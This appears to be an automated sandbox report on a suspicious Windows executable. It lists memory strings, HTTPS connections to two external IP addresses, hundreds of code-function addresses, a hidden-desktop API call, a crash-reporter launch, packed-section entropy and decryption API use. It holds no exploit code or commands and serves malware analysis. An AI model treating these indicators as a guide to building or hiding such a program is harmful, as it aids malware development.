Source: chrome.exe, 00000006.00000003.1982880525.00004C1C0571C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818197221.00004C1C053CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818510116.00004C1C056E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818218924.00004C1C05714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818478911.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818154218.00004C1C05734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2935453841.00004C1C04D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2939212221.00004C1C0570D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000006.00000003.1812954560.00004C1C056C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1813075023.00004C1C05770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1818154218.00004C1C05734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2939212221.00004C1C0570D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1819655378.00004C1C057AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000006.00000002.2933031959.00004C1C046D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.1787860445.00004C1C04A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2934379631.00004C1C04AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_0040F2B3 CreateDesktopA,

2_2_0040F2B3

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 0_2_02FB0870	0_2_02FB0870
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 0_2_02FB0861	0_2_02FB0861
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00402051	2_2_00402051
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436001	2_2_00436001
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00438011	2_2_00438011
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E031	2_2_0043E031
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E0F1	2_2_0043E0F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004200A1	2_2_004200A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004280A1	2_2_004280A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420141	2_2_00420141
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00438151	2_2_00438151
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440151	2_2_00440151
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C171	2_2_0043C171
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00428171	2_2_00428171
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436111	2_2_00436111
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004421C1	2_2_004421C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004361D1	2_2_004361D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004381E1	2_2_004381E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004201E1	2_2_004201E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436271	2_2_00436271
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E271	2_2_0043E271
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C211	2_2_0043C211
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440211	2_2_00440211
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00422231	2_2_00422231
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004382C1	2_2_004382C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C2D1	2_2_0043C2D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004402D1	2_2_004402D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004422F1	2_2_004422F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420291	2_2_00420291
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00422341	2_2_00422341
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436361	2_2_00436361
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E311	2_2_0043E311
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004383D1	2_2_004383D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004403D1	2_2_004403D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C3F1	2_2_0043C3F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004283B1	2_2_004283B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004423B1	2_2_004423B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436451	2_2_00436451
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00422401	2_2_00422401
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E4C1	2_2_0043E4C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004364F1	2_2_004364F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C481	2_2_0043C481
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004204B1	2_2_004204B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041E541	2_2_0041E541
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C521	2_2_0043C521
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440521	2_2_00440521
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00442521	2_2_00442521
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004425C1	2_2_004425C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E5D1	2_2_0043E5D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00406581	2_2_00406581
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436581	2_2_00436581
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420581	2_2_00420581
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00438641	2_2_00438641
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E661	2_2_0043E661
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440611	2_2_00440611
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C621	2_2_0043C621
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436621	2_2_00436621
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0042A6E1	2_2_0042A6E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C711	2_2_0043C711
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420711	2_2_00420711
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440711	2_2_00440711
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004407D1	2_2_004407D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C7F1	2_2_0043C7F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00438791	2_2_00438791
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E791	2_2_0043E791
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004207A1	2_2_004207A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440871	2_2_00440871
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436811	2_2_00436811
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E8D1	2_2_0043E8D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C891	2_2_0043C891
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004368B1	2_2_004368B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C941	2_2_0043C941
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436951	2_2_00436951
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420951	2_2_00420951
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043E971	2_2_0043E971
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041E9C1	2_2_0041E9C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043C9E1	2_2_0043C9E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004369E1	2_2_004369E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420A11	2_2_00420A11
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440A31	2_2_00440A31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440AE1	2_2_00440AE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420AF1	2_2_00420AF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043EAB1	2_2_0043EAB1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043CB31	2_2_0043CB31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043EBD1	2_2_0043EBD1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043CBF1	2_2_0043CBF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420BB1	2_2_00420BB1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440BB1	2_2_00440BB1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420C51	2_2_00420C51
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440CE1	2_2_00440CE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043ECF1	2_2_0043ECF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043CD41	2_2_0043CD41
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00438D71	2_2_00438D71
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436D11	2_2_00436D11
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436DD1	2_2_00436DD1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043EDE1	2_2_0043EDE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00424D91	2_2_00424D91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440D91	2_2_00440D91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043CE41	2_2_0043CE41
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043EE71	2_2_0043EE71
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436EC1	2_2_00436EC1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440EC1	2_2_00440EC1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041EE91	2_2_0041EE91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00424EA1	2_2_00424EA1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043EF61	2_2_0043EF61
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00420F61	2_2_00420F61
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00424F61	2_2_00424F61
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041EF31	2_2_0041EF31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00446FC0	2_2_00446FC0
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043CFD1	2_2_0043CFD1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00440FE1	2_2_00440FE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00434F81	2_2_00434F81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00436F91	2_2_00436F91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F061	2_2_0041F061
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D071	2_2_0043D071
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F001	2_2_0043F001
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004210D1	2_2_004210D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004410D1	2_2_004410D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F0A1	2_2_0043F0A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F171	2_2_0043F171
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D101	2_2_0043D101
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004211C1	2_2_004211C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004411D1	2_2_004411D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F1F1	2_2_0041F1F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004051B1	2_2_004051B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F261	2_2_0043F261
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D221	2_2_0043D221
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004372C1	2_2_004372C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004212C1	2_2_004212C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004412E1	2_2_004412E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D341	2_2_0043D341
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437351	2_2_00437351
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F321	2_2_0043F321
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F331	2_2_0041F331
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004053F1	2_2_004053F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F3F1	2_2_0043F3F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421391	2_2_00421391
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004413B1	2_2_004413B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441461	2_2_00441461
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D471	2_2_0043D471
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421431	2_2_00421431
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F4C1	2_2_0041F4C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F4C1	2_2_0043F4C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437481	2_2_00437481
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F561	2_2_0041F561
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437561	2_2_00437561
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441511	2_2_00441511
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F581	2_2_0043F581
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004415B1	2_2_004415B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421641	2_2_00421641
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F671	2_2_0041F671
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00405611	2_2_00405611
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F621	2_2_0043F621
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004216E1	2_2_004216E1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D691	2_2_0043D691
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004356A1	2_2_004356A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004376A1	2_2_004376A1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437741	2_2_00437741
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00435761	2_2_00435761
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D771	2_2_0043D771
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F701	2_2_0043F701
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F721	2_2_0041F721
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441721	2_2_00441721
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F7D1	2_2_0043F7D1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F7F1	2_2_0041F7F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004417F1	2_2_004417F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00435811	2_2_00435811
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421811	2_2_00421811
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437831	2_2_00437831
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F8F1	2_2_0043F8F1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D881	2_2_0043D881
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F8B1	2_2_0041F8B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004358B1	2_2_004358B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004278B1	2_2_004278B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004418B1	2_2_004418B1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041F971	2_2_0041F971
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00435971	2_2_00435971
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043D921	2_2_0043D921
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004219C1	2_2_004219C1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043F981	2_2_0043F981
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441981	2_2_00441981
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00427991	2_2_00427991
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441A51	2_2_00441A51
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437A21	2_2_00437A21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DA21	2_2_0043DA21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FA21	2_2_0043FA21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FAC1	2_2_0043FAC1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DAE1	2_2_0043DAE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421AF1	2_2_00421AF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00427A81	2_2_00427A81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441B41	2_2_00441B41
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00427B21	2_2_00427B21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FBE1	2_2_0043FBE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441BF1	2_2_00441BF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DB91	2_2_0043DB91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437C01	2_2_00437C01
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041FC21	2_2_0041FC21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DC31	2_2_0043DC31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441CC1	2_2_00441CC1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DCD1	2_2_0043DCD1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FC81	2_2_0043FC81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00427C81	2_2_00427C81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00435D11	2_2_00435D11
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437D21	2_2_00437D21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DDE1	2_2_0043DDE1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437DF1	2_2_00437DF1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FD81	2_2_0043FD81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441D91	2_2_00441D91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041FDA1	2_2_0041FDA1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441E61	2_2_00441E61
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041FE31	2_2_0041FE31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00437EC1	2_2_00437EC1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043DED1	2_2_0043DED1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FE81	2_2_0043FE81
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0043FF21	2_2_0043FF21
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00441F31	2_2_00441F31
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0041FF91	2_2_0041FF91
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00421FB1	2_2_00421FB1

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 936

Source: ZT0KQ1PC.exe, 00000000.00000002.1802486611.00000000013EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs ZT0KQ1PC.exe

Source: ZT0KQ1PC.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: ZT0KQ1PC.exe

Static PE information: Section: .bss ZLIB complexity 1.0003276909722223

Source: ZT0KQ1PC.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ZT0KQ1PC.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
